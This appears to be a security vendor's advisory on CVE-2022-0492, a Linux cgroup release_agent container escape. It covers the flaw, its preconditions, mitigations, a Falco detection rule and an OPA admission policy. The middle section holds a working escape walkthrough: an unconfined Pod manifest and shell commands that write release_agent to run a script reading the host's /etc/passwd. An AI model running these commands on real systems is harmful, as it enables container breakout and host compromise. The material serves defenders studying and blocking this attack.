Linux maintainers disclosed a privilege escalation vulnerability in the Linux kernel. The vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) ID CVE-2022-0492 and is rated High severity (7.0).
The flaw lies in cgroups and allows an attacker to escape container environments and elevate privileges.
The vulnerable code is in the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. The issue is fixed in kernel 5.17-rc3.
Most container environments already enable, by default, the security settings that prevent this container escape: containers running with SELinux, AppArmor, or Seccomp are protected. That said, containers that don't follow security best practices are not unusual, and they can expose your environment to serious risks.
In any case, we advise all Linux users to download and install the latest kernel version.
The CVE-2022-0492 issue
Container escapes that abuse release_agent are already known, but they require the CAP_SYS_ADMIN capability inside the container.
CVE-2022-0492 shows a new technique to achieve the same escape. In particular, an attacker can create a new user namespace, in which they hold CAP_SYS_ADMIN, mount cgroupfs there, and then edit the release_agent file, because the kernel did not verify that the writer was privileged in the initial user namespace.
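The permission gap described above can be sketched as a simplified model. This is not kernel code: the Writer fields are hypothetical names, and the "patched" branch reflects our reading of the fix (the write is refused unless the writer is privileged in the initial user namespace), not the exact kernel logic.

```python
from dataclasses import dataclass


@dataclass
class Writer:
    """Hypothetical, simplified view of a process writing to release_agent."""
    is_file_owner: bool  # root of the user namespace that mounted this cgroupfs
    cgroup_ns_owned_by_init_userns: bool  # writer's cgroup namespace belongs to the host user namespace
    cap_sys_admin_in_init_userns: bool  # writer holds CAP_SYS_ADMIN on the host


def can_write_release_agent(w: Writer, patched: bool) -> bool:
    # Ordinary file permissions apply in both cases.
    if not w.is_file_owner:
        return False
    if not patched:
        # Before the fix: no extra capability check on the write.
        return True
    # After the fix (simplified): refuse unless privileged in the initial user namespace.
    return w.cgroup_ns_owned_by_init_userns and w.cap_sys_admin_in_init_userns


# Attacker: "root" inside freshly unshared user/mount/cgroup namespaces.
attacker = Writer(is_file_owner=True,
                  cgroup_ns_owned_by_init_userns=False,
                  cap_sys_admin_in_init_userns=False)
print(can_write_release_agent(attacker, patched=False))  # True
print(can_write_release_agent(attacker, patched=True))   # False
```

The point of the model is that owning the file inside a new user namespace was enough before the fix, and is no longer enough after it.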
One of the features of cgroups v1 is the release_agent file. It allows administrators to configure a “release agent” program that runs when a cgroup becomes empty. When the last process in a cgroup exits and the cgroup has no child cgroups, the kernel checks whether that cgroup has notify_on_release enabled. If it does, the kernel spawns the release_agent binary configured for the hierarchy, running as root.
This means that anyone who can write to the release_agent file can force the kernel to run a binary of their choice with elevated privileges and take control of the entire system. For this reason, the release_agent file is owned by root, and only root can write to it.
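The release mechanism described above can be illustrated with a toy model of a single cgroup v1 hierarchy. It is a sketch for intuition only: the class and method names are hypothetical, and it ignores details such as the kernel copying a parent's notify_on_release value into new child cgroups.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass
class Hierarchy:
    """Toy model of one cgroup v1 hierarchy (illustration only, not kernel code)."""
    release_agent: str = ""  # contents of release_agent in the hierarchy root
    notify_on_release: Dict[str, bool] = field(default_factory=dict)  # cgroup path -> flag
    tasks: Dict[str, Set[int]] = field(default_factory=dict)  # cgroup path -> PIDs

    def mkdir(self, path: str) -> None:
        # In this model new cgroups start empty with notify_on_release = 0
        # (the real kernel copies the parent's value).
        self.notify_on_release[path] = False
        self.tasks[path] = set()

    def task_exit(self, path: str, pid: int) -> Optional[List[str]]:
        """Remove pid from the cgroup; return the agent argv the kernel would run, if any."""
        self.tasks[path].discard(pid)
        has_children = any(p.startswith(path + "/") for p in self.tasks)
        released = not self.tasks[path] and not has_children
        if released and self.notify_on_release[path] and self.release_agent:
            # Runs as root in the host's namespaces; the only argument is the
            # abandoned cgroup's path relative to the hierarchy root.
            return [self.release_agent, path]
        return None


h = Hierarchy(release_agent="/usr/local/bin/cleanup")  # hypothetical agent path
h.mkdir("/x")
h.notify_on_release["/x"] = True
h.tasks["/x"].add(1234)
print(h.task_exit("/x", 1234))  # ['/usr/local/bin/cleanup', '/x']
```

Whoever controls the release_agent string controls what runs as root when any notifying cgroup empties, which is why write access to that file is so sensitive.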
Exploiting CVE-2022-0492
As mentioned before, most container environments that follow security best practices are secure by default. To exploit the vulnerability, all of the following conditions must be met:
- The container runs as root: only root can modify the release_agent file, so this condition is mandatory.
- AppArmor and SELinux are disabled: both prevent the cgroupfs mount.
- Seccomp is disabled: only containers running without it can create a new user namespace.
- The host uses cgroup v1 for its root cgroup hierarchy, which is still the more widely used version.
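The four conditions listed above can be turned into a small checklist. This is a sketch under stated assumptions: the Posture fields are hypothetical inputs that you gather yourself (the code does not detect AppArmor, SELinux, or Seccomp), and has_cgroup_v1 only inspects /proc/mounts-style text, where v1 hierarchies have filesystem type "cgroup" and the unified v2 hierarchy has type "cgroup2".

```python
from dataclasses import dataclass
from typing import List


def has_cgroup_v1(mounts_text: str) -> bool:
    """True if /proc/mounts-style text lists at least one cgroup v1 hierarchy.

    Each line is "device mountpoint fstype options dump pass".
    """
    return any(
        len(fields) >= 3 and fields[2] == "cgroup"
        for fields in (line.split() for line in mounts_text.splitlines())
    )


@dataclass
class Posture:
    runs_as_root: bool
    apparmor_or_selinux_enforced: bool
    seccomp_enforced: bool
    host_has_cgroup_v1: bool


def unmet_conditions(p: Posture) -> List[str]:
    """Return the exploitation conditions that are NOT met (empty list = all met)."""
    unmet = []
    if not p.runs_as_root:
        unmet.append("container does not run as root")
    if p.apparmor_or_selinux_enforced:
        unmet.append("AppArmor or SELinux is enforced")
    if p.seccomp_enforced:
        unmet.append("Seccomp is enforced")
    if not p.host_has_cgroup_v1:
        unmet.append("host has no cgroup v1 hierarchy")
    return unmet
```

On the host, has_cgroup_v1(open("/proc/mounts").read()) gives the last input; an empty result from unmet_conditions means every precondition described above holds and the container should be treated as exposed.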
Let’s look at the exploitation using a Kubernetes Pod. Here is the Pod manifest deployed for the test:
apiVersion: v1
kind: Pod
metadata:
  labels:
    app: apache-httpd
  name: apache-httpd
  namespace: apache-httpd
  annotations:
    container.apparmor.security.beta.kubernetes.io/apache-httpd: unconfined
    container.seccomp.security.alpha.kubernetes.io/apache-httpd: unconfined
spec:
  containers:
  - name: apache-httpd
    image: darryk/apache2.4.49
    ports:
    - containerPort: 80
      hostPort: 80
In particular, the following two annotations disable AppArmor and Seccomp for the apache-httpd container:
- container.apparmor.security.beta.kubernetes.io/apache-httpd: unconfined
- container.seccomp.security.alpha.kubernetes.io/apache-httpd: unconfined
It is worth noting that if the container runs as privileged, AppArmor and Seccomp confinement are not applied to it and it receives all capabilities. In that scenario, this new technique is just one more way to escape the container, alongside several well-known ones. A container is made privileged with:
securityContext:
  privileged: true
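The risky settings discussed above (unconfined AppArmor or Seccomp annotations, and privileged containers) can be flagged in a Pod manifest parsed into a dict. A minimal sketch, assuming the annotation-based configuration shown in the manifest; it does not cover other ways of setting profiles, such as the securityContext seccompProfile field, and risky_settings is a hypothetical helper name.

```python
from typing import Any, Dict, List

APPARMOR_PREFIX = "container.apparmor.security.beta.kubernetes.io/"
SECCOMP_PREFIX = "container.seccomp.security.alpha.kubernetes.io/"


def risky_settings(pod: Dict[str, Any]) -> List[str]:
    """Return findings for a Pod manifest already parsed into a dict."""
    findings = []
    annotations = pod.get("metadata", {}).get("annotations") or {}
    for key, value in annotations.items():
        if value != "unconfined":
            continue
        # The annotation key suffix is the container name.
        if key.startswith(APPARMOR_PREFIX):
            findings.append(f"AppArmor unconfined for {key[len(APPARMOR_PREFIX):]}")
        elif key.startswith(SECCOMP_PREFIX):
            findings.append(f"Seccomp unconfined for {key[len(SECCOMP_PREFIX):]}")
    for container in pod.get("spec", {}).get("containers", []):
        if (container.get("securityContext") or {}).get("privileged") is True:
            findings.append(f"privileged container {container.get('name')}")
    return findings
```

Fed the test Pod above (for example after loading the YAML with a parser such as PyYAML), it reports both unconfined annotations for apache-httpd.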
Once the Pod is deployed, we can run unshare inside the container to create new user, mount, and cgroup namespaces. We can then mount cgroupfs and write our data to release_agent.
unshare -UrmC bash
mkdir /tmp/mountest && mount -t cgroup -o rdma cgroup /tmp/mountest && mkdir /tmp/mountest/x
To trigger the exploit, we also need the kernel to invoke the release_agent, which happens when all processes in a cgroup have exited. To enable release notifications for the “x” cgroup we created, we write 1 to its notify_on_release file.
We also need to point the release_agent file at a /cmd script that reads the host’s sensitive /etc/passwd file and writes its content to an output file inside the container’s filesystem. Because the release agent runs on the host, it needs the host path of the container’s filesystem, which we take from the overlay upperdir entry in /etc/mtab.
echo 1 > /tmp/mountest/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/mountest/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/passwd > $host_path/output" >> /cmd
chmod a+x /cmd
We can now trigger the attack by spawning a process inside the child cgroup that exits immediately. In our test, the attack succeeded and we retrieved the host’s /etc/passwd file from inside the container, in the /output file.
sh -c "echo \$\$ > /tmp/mountest/x/cgroup.procs"
This is just an example of a successful container escape; attackers can perform far more damaging actions to fully compromise the host.
The impact of CVE-2022-0492
The flaw is rated High severity, with a CVSS score of 7.0. It has a high impact and is easy to exploit for local attackers with root access inside the container.
To learn more about how a vulnerability score is calculated, see “Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively.”
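As a worked example of how a 7.0 base score can arise, here is a sketch of the CVSS v3.1 base-score formula for Scope: Unchanged. The article does not state the vector; we assume CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H, one vector that yields 7.0 (local access, high attack complexity, low privileges, high impact). Changed-scope vectors are deliberately not handled.

```python
import math

# CVSS v3.1 metric weights (Scope: Unchanged only).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, float-safe."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # Skip the "CVSS:3.1" prefix and parse "Metric:Value" pairs.
    m = dict(part.split(":") for part in vector.split("/")[1:])
    if m["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"))  # 7.0
```

Here the impact sub-score is about 5.87 and the exploitability sub-score about 1.05, so the sum (about 6.92) rounds up to 7.0. The high attack complexity is what keeps the score below 8 despite full confidentiality, integrity, and availability impact.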
If attackers can exploit the vulnerability, they can leverage this flaw to escape a container environment and gain root privileges on the host system.
As we have seen, checking whether a container environment is vulnerable and exploiting it are both fairly straightforward. In addition, similar escape techniques are already well known, which makes this vulnerability even easier to exploit.
Mitigating CVE-2022-0492
CVE-2022-0492 can be mitigated by upgrading to a patched kernel.
If patching is not possible, you can disable unprivileged user namespaces without rebooting, for example by setting the user.max_user_namespaces sysctl to 0, or kernel.unprivileged_userns_clone to 0 on Debian and Ubuntu kernels. WARNING: this may affect the host’s ability to run containers.
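To verify the user-namespace mitigation above, the relevant sysctls can be read from /proc/sys. This is a sketch assuming two knobs: user.max_user_namespaces (upstream, where 0 prevents creating new user namespaces) and kernel.unprivileged_userns_clone (only present on kernels carrying the Debian/Ubuntu patch). The helper names are hypothetical, and a missing or unreadable file is reported as None rather than guessed.

```python
from pathlib import Path
from typing import Dict, Optional


def read_int(path: Path) -> Optional[int]:
    """Read an integer sysctl value; None if the file is missing or unreadable."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


def userns_settings(proc_sys: Path = Path("/proc/sys")) -> Dict[str, Optional[int]]:
    return {
        # Upstream knob: 0 prevents creating new user namespaces.
        "user.max_user_namespaces": read_int(proc_sys / "user" / "max_user_namespaces"),
        # Debian/Ubuntu-specific knob: 0 blocks user namespaces for unprivileged callers.
        "kernel.unprivileged_userns_clone": read_int(proc_sys / "kernel" / "unprivileged_userns_clone"),
    }


def userns_restricted(settings: Dict[str, Optional[int]]) -> bool:
    """True if either knob is set to 0 (None means absent or unreadable)."""
    return (settings["user.max_user_namespaces"] == 0
            or settings["kernel.unprivileged_userns_clone"] == 0)


if __name__ == "__main__":
    s = userns_settings()
    print(s, "restricted" if userns_restricted(s) else "NOT restricted")
```

Run on the host rather than in a container, so that the values reflect the host’s configuration.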
Run and Response: Event Detection
With a runtime detection engine such as Falco, you can detect attacks at runtime, once your containers are already in production. Falco, a CNCF incubating project, can help detect anomalous activity in cloud-native environments. The following Falco rule can help you detect attempts to exploit CVE-2022-0492.
- rule: Linux Cgroup Container Escape Vulnerability (CVE-2022-0492)
  desc: "This rule detects an attempt to exploit a container escape vulnerability in the Linux Kernel."
  condition: >
    container.id != host and proc.name = "unshare" and spawned_process
    and evt.args contains "mount" and evt.args contains "-o rdma"
    and evt.args contains "/release_agent"
  output: "Detect Linux Cgroup Container Escape Vulnerability (CVE-2022-0492) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
  priority: CRITICAL
  tags: [process, mitre_privilege_escalation]
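To see what the rule’s condition actually requires, its boolean structure can be mirrored in a few lines. This is only an illustration: ExecEvent and its fields are hypothetical stand-ins for Falco fields, and evt.args is treated as a plain string, which is not Falco’s exact format. Because all three substrings must appear in the arguments of a single unshare process, an interactive `unshare -UrmC bash` followed by separate commands, as in the walkthrough, would not match, while a one-shot command line would.

```python
from dataclasses import dataclass

# Substrings the rule requires in evt.args, copied from its condition.
REQUIRED = ("mount", "-o rdma", "/release_agent")


@dataclass
class ExecEvent:
    """Simplified stand-in for a Falco event; field names are hypothetical."""
    in_container: bool  # the rule's container.id check
    proc_name: str  # proc.name
    spawned_process: bool  # the spawned_process macro
    args: str  # evt.args, treated here as a plain string


def rule_matches(e: ExecEvent) -> bool:
    return (e.in_container and e.proc_name == "unshare" and e.spawned_process
            and all(s in e.args for s in REQUIRED))


# Interactive form from the walkthrough: no match.
print(rule_matches(ExecEvent(True, "unshare", True, "-UrmC bash")))  # False
# One-shot form carrying the whole sequence: match.
one_shot = "-UrmC bash -c 'mount -t cgroup -o rdma cgroup /mnt; echo x > /mnt/release_agent'"
print(rule_matches(ExecEvent(True, "unshare", True, one_shot)))  # True
```

If coverage of the interactive variant matters, consider additional rules keyed on the mount or on writes to release_agent rather than on unshare’s arguments alone.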
Deploy: Image scanner on admission controller
By implementing image scanning in the admission controller, you can admit to the cluster only workload images that comply with the scanning policy.
You can create a validating admission webhook that rejects non-compliant workloads when they are created or modified. If you already have an admission policy mechanism (such as OPA Gatekeeper), you can create a policy that enforces this restriction.
This component can reject images based on criteria such as name, tag, namespace, or CVE severity level.
Once a policy is created and assigned, the admission controller evaluates the images of new deployments and blocks the deployment if the security issue is detected.
Using the following OPA Rego policy, we can make sure that a Pod being deployed does not disable AppArmor or Seccomp.
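The admission decision described above can be sketched as the core of a validating webhook handler. Assumptions, labeled plainly: scan_results is a hypothetical mapping from image name to the highest severity your scanner reported, the severity scale is illustrative, unscanned images are rejected, and HTTP serving and TLS are left out. The response follows the admission.k8s.io/v1 AdmissionReview shape (uid, allowed, and an optional status).

```python
from typing import Any, Dict, Mapping

# Illustrative severity scale; align it with your scanner's output.
SEVERITY_ORDER = {"negligible": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


def review(admission_review: Dict[str, Any], scan_results: Mapping[str, str],
           block_at: str = "high") -> Dict[str, Any]:
    """Build an AdmissionReview response for a Pod from per-image scan results."""
    request = admission_review["request"]
    pod = request["object"]
    threshold = SEVERITY_ORDER[block_at]
    rejected = []
    for container in pod.get("spec", {}).get("containers", []):
        severity = scan_results.get(container["image"])
        # Block unscanned images and anything at or above the threshold.
        if severity is None or SEVERITY_ORDER[severity] >= threshold:
            rejected.append(f"{container['image']} ({severity or 'not scanned'})")
    response: Dict[str, Any] = {"uid": request["uid"], "allowed": not rejected}
    if rejected:
        response["status"] = {"code": 403,
                              "message": "blocked by scan policy: " + ", ".join(rejected)}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "response": response}
```

Echoing the request uid back is required for the API server to match the response to its request; rejecting unscanned images is a conservative design choice that you may want to relax per namespace.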
package kubernetes.admission

# True if an annotation sets the AppArmor profile of a container to "unconfined"
disablesConfinement(annotations) {
  some k
  annotations[k] == "unconfined"
  startswith(k, "container.apparmor.security.beta.kubernetes.io/")
}

# True if an annotation sets the Seccomp profile of a container to "unconfined"
disablesConfinement(annotations) {
  some k
  annotations[k] == "unconfined"
  startswith(k, "container.seccomp.security.alpha.kubernetes.io/")
}

# Reject Pods whose annotations disable AppArmor or Seccomp
deny[message] {
  input.request.kind.kind == "Pod"
  metadata := input.request.object.metadata
  disablesConfinement(metadata.annotations)
  message := sprintf("Pod %v disables AppArmor or Seccomp", [metadata.name])
}
Conclusion
Fortunately, CVE-2022-0492 has already been discovered and patched. However, because it is so easy to exploit, it is important to put mechanisms in place that prevent vulnerable workloads from being deployed and to monitor runtime events to detect attacks on existing hosts.
Administrators and users need to keep their systems up to date with the latest security patches. Depending on the environment, patching can be time-consuming. Fortunately, open source tools such as Falco and OPA can help detect exploitation attempts and block risky deployments before attackers can take advantage of unpatched systems.
If you would like to find out more about Falco:
- Get started at Falco.org.
- Check out the Falco project on GitHub.
- Get involved with the Falco community.
- Meet the maintainers on the Falco Slack.
- Follow @falco_org on Twitter.